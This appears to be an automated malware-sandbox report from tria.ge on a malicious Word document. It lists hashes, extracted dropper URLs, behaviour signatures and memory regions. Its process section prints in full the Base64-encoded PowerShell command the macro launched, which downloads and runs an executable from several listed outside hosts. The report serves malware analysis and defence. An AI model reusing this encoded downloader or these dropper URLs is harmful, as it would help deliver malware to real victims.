Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    117s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags

    arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
  • submitted
    20/08/2024, 12:11

General

  • Target

    af2a61fea70fc4b92dfc72bdd17ae2af_JaffaCakes118.doc

  • Size

    161KB

  • MD5

    af2a61fea70fc4b92dfc72bdd17ae2af

  • SHA1

    9a7b42d1014ddc487430e446391e57d3ec1d0189

  • SHA256

    4b44a49d851cfe708c39124110dcb95dd328ecb52b9c80a0bc91c9fffd677ef0

  • SHA512

    d35a712a77f76ef2a906d1a58bd73b05406f0b09d5d9fdb4e5d18d5e355f3688af0f3850e5bd564fd2ee5e91751d0097edc131fd852cd835ed798275c0034e66

  • SSDEEP

    3072:+KNtK1zjRjJz22TWTogk079THcpOu5UZTCWJ3/t5AtmGj:+Ct+zjR9/TX07hHcJQTJvt5AtmGj

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://khobormalda.com/wp-content/82/

exe.dropper

http://blog.zunapro.com/wp-admin/LEE/

exe.dropper

http://megasolucoesti.com/R9KDq0O8w/Y/

exe.dropper

https://online24h.biz/wp-admin/K/

exe.dropper

https://fepami.com/wp-includes/eaI/

exe.dropper

http://ora-ks.com/system/cache/w/

exe.dropper

http://padamagro.com/wp-admin/Nc/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 3 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Office loads VBA resources, possible macro or embedded object present
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\af2a61fea70fc4b92dfc72bdd17ae2af_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2456
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1644
    • C:\Windows\System32\WindowsPowerShell\v1.0\POWeRsHeLL.exe
      POWeRsHeLL -ENCOD JABCADQAegBtAGEAMQBiAD0AKAAoACcAVAAnACsAJwB5AHUAJwApACsAJwBhAHYAJwArACcAYwBoACcAKQA7ACYAKAAnAG4AJwArACcAZQB3AC0AaQB0ACcAKwAnAGUAbQAnACkAIAAkAEUAbgBWADoAdQBTAEUAcgBQAFIATwBGAEkAbABFAFwASAB5AHUAOQBoAFYAMwBcAE0AZgBOAFgATwAzAHcAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAARABJAHIARQBDAFQATwBSAFkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMAZQBgAGMAVQByAGkAdAB5AHAAYABSAG8AYABUAE8AQwBPAGwAIgAgAD0AIAAoACgAJwB0ACcAKwAnAGwAcwAnACkAKwAoACcAMQAyACcAKwAnACwAIAB0ACcAKQArACcAbAAnACsAKAAnAHMAJwArACcAMQAxACwAIAAnACkAKwAoACcAdABsACcAKwAnAHMAJwApACkAOwAkAFIAYwBkAHgAaQBjADgAIAA9ACAAKAAnAFgAJwArACgAJwA5AG8AJwArACcAdQAnACsAJwBxAGYAdAAnACkAKQA7ACQAQwB5AG8AdQBjAHAAZgA9ACgAJwBMAGYAJwArACgAJwB2AHAAJwArACcAbgB1AHQAJwApACkAOwAkAEUANwAyADcAMQBxAGMAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAKAAoACcAewAnACsAJwAwAH0ASAB5AHUAOQBoAHYAMwAnACsAJwB7ADAAfQBNAGYAJwArACcAbgAnACsAJwB4ACcAKwAnAG8AMwB3AHsAMAB9ACcAKQAgAC0AZgBbAGMASABhAFIAXQA5ADIAKQArACQAUgBjAGQAeABpAGMAOAArACgAJwAuACcAKwAoACcAZQB4ACcAKwAnAGUAJwApACkAOwAkAFEAZgBoAHQAYQAzAHQAPQAoACgAJwBaACcAKwAnADAAMgBxACcAKQArACcAbwBjACcAKwAnAHIAJwApADsAJABYAGcAdAA2AGkAMwB3AD0AJgAoACcAbgAnACsAJwBlAHcALQBvACcAKwAnAGIAagBlAGMAdAAnACkAIABuAGUAdAAuAHcAZQBCAEMAbABpAGUAbgB0ADsAJABWADUAaABqAGMAeQAxAD0AKAAnAGgAdAAnACsAJwB0ACcAKwAoACcAcAA6AC8AJwArACcALwAnACkAKwAnAGsAJwArACgAJwBoAG8AJwArACcAYgBvACcAKwAnAHIAbQAnACsAJwBhAGwAZABhACcAKQArACgAJwAuACcAKwAnAGMAbwAnACkAKwAnAG0AJwArACcALwAnACsAKAAnAHcAcAAnACsAJwAtAGMAbwBuAHQAZQAnACsAJwBuACcAKQArACcAdAAvACcAKwAnADgAJwArACcAMgAvACcAKwAnACoAaAAnACsAKAAnAHQAdABwACcAKwAnADoAJwArACcALwAvAGIAJwApACsAKAAnAGwAJwArACcAbwBnACcAKQArACcALgB6ACcAKwAoACcAdQBuAGEAcAAnACsAJwByACcAKQArACgAJwBvAC4AJwArACcAYwAnACkAKwAoACcAbwAnACsAJwBtAC8AdwBwAC0AJwApACsAKAAnAGEAJwArACcAZABtACcAKQArACcAaQAnACsAJwBuAC8AJwArACgAJwBMACcAKwAnAEUARQAvACcAKQArACgAJwAqAGgAdAB0ACcAKwAnAHAAOgAvAC8AJwArACcAbQAnACsAJwBlAGcAYQBzACcAKQArACgAJwBvAGwAdQAnACsAJwBjAG8AJwApACsAJwBlACcAKwAnAHMAJwArACgAJwB0AGkAJwArACcALgAnACsAJwBjAG8AbQAnACkAKwAnAC8AJwArACcAUgA5ACcAKwAoACcASwBEAHEAMABPACcAKwAnADgAJwApACsAJwB3ACcAKwAnAC8AJwArACgAJwBZAC8AJwArACcAKgAnACkAKwAnAGgAdAAnACsAKAAnAHQAcABzACcAKwAnADoALwAvAG8AJwApACsAJwBuACcAKwAoACcAbABpACcAKwAnAG4AZQAyADQAaAAuACcAKQArACcAYgBpACcAKwAoACcAegAnACsAJwAvAHcAJwArACcAcAAtAGEAZABtACcAKwAnAGkAbgAvACcAKQArACcASwAvACcAKwAoACcAKgBoAHQAdAAnACsAJwBwAHMAJwApACsAKAAnADoALwAnACsAJwAvACcAKQArACcAZgAnACsAJwBlAHAAJwArACgAJwBhAG0AJwArACcAaQAuAGMAJwApACsAKAAnAG8AJwArACcAbQAvAHcAJwApACsAJwBwAC0AJwArACgAJwBpAG4AYwAnACsAJwBsAHUAZABlACcAKwAnAHMAJwApACsAKAAnAC8AZQBhACcAKwAnAEkALwAqACcAKQArACcAaAAnACsAJwB0ACcAKwAnAHQAJwArACgAJwBwADoALwAnACsAJwAvAG8AJwApACsAJwByACcAKwAnAGEAJwArACcALQAnACsAKAAnAGsAcwAnACsAJwAuAGMAJwApACsAJwBvACcAKwAoACcAbQAvACcAKwAnAHMAJwApACsAJwB5AHMAJwArACcAdABlACcAKwAoACcAbQAvACcAKwAnAGMAYQBjACcAKQArACgAJwBoACcAKwAnAGUALwAnACkAKwAoACcAdwAvACcAKwAnACoAaAAnACkAKwAoACcAdAB0ACcAKwAnAHAAOgAvACcAKwAnAC8AcAAnACkAKwAnAGEAJwArACcAZABhACcAKwAoACcAbQAnACsAJwBhAGcAJwApACsAKAAnAHIAbwAuACcAKwAnAGMAJwArACcAbwBtAC8AdwAnACkAKwAoACcAcAAtACcAKwAnAGEAZAAnACkAKwAoACcAbQBpAG4AJwArACcALwAnACkAKwAnAE4AYwAnACsAJwAvACcAKQAuACIAcwBwAEwAYABpAHQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABIAGQAagBuAGwAcgBsAD0AKAAoACcATgB5AHUAcABzACcAKwAnADMAJwApACsAJwBiACcAKQA7AGYAbwByAGUAYQBjAGgAKAAkAE0ANABzAHkAaABfAGQAIABpAG4AIAAkAFYANQBoAGoAYwB5ADEAKQB7AHQAcgB5AHsAJABYAGcAdAA2AGkAMwB3AC4AIgBEAG8AdwBuAEwAYABvAEEAZABgAEYASQBgAGwARQAiACgAJABNADQAcwB5AGgAXwBkACwAIAAkAEUANwAyADcAMQBxAGMAKQA7ACQASwA1ADkAawAwAF8AdgA9ACgAKAAnAEQAXwB3ACcAKwAnAGUAeQAnACkAKwAnAHoAdAAnACkAOwBJAGYAIAAoACgALgAoACcARwAnACsAJwBlAHQALQBJAHQAZQAnACsAJwBtACcAKQAgACQARQA3ADIANwAxAHEAYwApAC4AIgBMAGAARQBuAEcAVABIACIAIAAtAGcAZQAgADIANwA3ADUANgApACAAewAmACgAJwBJAG4AdgBvACcAKwAnAGsAZQAtAEkAdAAnACsAJwBlACcAKwAnAG0AJwApACgAJABFADcAMgA3ADEAcQBjACkAOwAkAFEAZgBrAGsAZwBqAGcAPQAoACcAVwAnACsAKAAnAF8AbQAnACsAJwBpACcAKQArACgAJwBkACcAKwAnADgAaAAnACkAKQA7AGIAcgBlAGEAawA7ACQASwBiAHUAZgBoADAAawA9ACgAJwBYAGgAJwArACgAJwBtADYAJwArACcAZwB4ADYAJwApACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEUAMgA2AHcAMwBiAGgAPQAoACgAJwBUACcAKwAnAHEAYwBfAGkAJwApACsAJwBlAGIAJwApAA==
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2620

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      19KB

      MD5

      675a7e604e833d2fef2ecd43278416b9

      SHA1

      e9d023d0beabb42a15706c20b39a8f1062d46968

      SHA256

      3f221238f710fbfa6d71a7482d388c7ab1c1e8af98fd21b6f08288b6228db29e

      SHA512

      221acd6e56f7f3c6f9bebcd9586c476da4872333c24514dc6f18fd212a2adc124ecd0de24daaafb53d0f27c434f903d95e9d54ce3ea43b0621a63affc630a04b

    • memory/2456-10-0x0000000000310000-0x0000000000410000-memory.dmp

      Filesize

      1024KB

    • memory/2456-25-0x0000000000310000-0x0000000000410000-memory.dmp

      Filesize

      1024KB

    • memory/2456-5-0x0000000000310000-0x0000000000410000-memory.dmp

      Filesize

      1024KB

    • memory/2456-6-0x0000000000310000-0x0000000000410000-memory.dmp

      Filesize

      1024KB

    • memory/2456-7-0x0000000000310000-0x0000000000410000-memory.dmp

      Filesize

      1024KB

    • memory/2456-8-0x0000000000310000-0x0000000000410000-memory.dmp

      Filesize

      1024KB

    • memory/2456-9-0x0000000000310000-0x0000000000410000-memory.dmp

      Filesize

      1024KB

    • memory/2456-21-0x0000000000310000-0x0000000000410000-memory.dmp

      Filesize

      1024KB

    • memory/2456-20-0x0000000000310000-0x0000000000410000-memory.dmp

      Filesize

      1024KB

    • memory/2456-26-0x0000000000310000-0x0000000000410000-memory.dmp

      Filesize

      1024KB

    • memory/2456-17-0x0000000000310000-0x0000000000410000-memory.dmp

      Filesize

      1024KB

    • memory/2456-16-0x0000000000310000-0x0000000000410000-memory.dmp

      Filesize

      1024KB

    • memory/2456-14-0x0000000000310000-0x0000000000410000-memory.dmp

      Filesize

      1024KB

    • memory/2456-15-0x0000000000310000-0x0000000000410000-memory.dmp

      Filesize

      1024KB

    • memory/2456-13-0x0000000000310000-0x0000000000410000-memory.dmp

      Filesize

      1024KB

    • memory/2456-12-0x0000000000310000-0x0000000000410000-memory.dmp

      Filesize

      1024KB

    • memory/2456-11-0x0000000000310000-0x0000000000410000-memory.dmp

      Filesize

      1024KB

    • memory/2456-0-0x000000002FBD1000-0x000000002FBD2000-memory.dmp

      Filesize

      4KB

    • memory/2456-2-0x000000007191D000-0x0000000071928000-memory.dmp

      Filesize

      44KB

    • memory/2456-22-0x0000000000310000-0x0000000000410000-memory.dmp

      Filesize

      1024KB

    • memory/2456-19-0x0000000000310000-0x0000000000410000-memory.dmp

      Filesize

      1024KB

    • memory/2456-24-0x0000000000310000-0x0000000000410000-memory.dmp

      Filesize

      1024KB

    • memory/2456-23-0x0000000000310000-0x0000000000410000-memory.dmp

      Filesize

      1024KB

    • memory/2456-32-0x0000000000310000-0x0000000000410000-memory.dmp

      Filesize

      1024KB

    • memory/2456-31-0x0000000000310000-0x0000000000410000-memory.dmp

      Filesize

      1024KB

    • memory/2456-30-0x0000000000310000-0x0000000000410000-memory.dmp

      Filesize

      1024KB

    • memory/2456-29-0x0000000000310000-0x0000000000410000-memory.dmp

      Filesize

      1024KB

    • memory/2456-28-0x0000000000310000-0x0000000000410000-memory.dmp

      Filesize

      1024KB

    • memory/2456-27-0x0000000000310000-0x0000000000410000-memory.dmp

      Filesize

      1024KB

    • memory/2456-67-0x000000007191D000-0x0000000071928000-memory.dmp

      Filesize

      44KB

    • memory/2456-66-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2456-44-0x000000007191D000-0x0000000071928000-memory.dmp

      Filesize

      44KB

    • memory/2456-45-0x0000000000310000-0x0000000000410000-memory.dmp

      Filesize

      1024KB

    • memory/2456-46-0x0000000000310000-0x0000000000410000-memory.dmp

      Filesize

      1024KB

    • memory/2456-47-0x0000000000310000-0x0000000000410000-memory.dmp

      Filesize

      1024KB

    • memory/2456-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2620-39-0x0000000001EF0000-0x0000000001EF8000-memory.dmp

      Filesize

      32KB

    • memory/2620-38-0x000000001B6D0000-0x000000001B9B2000-memory.dmp

      Filesize

      2.9MB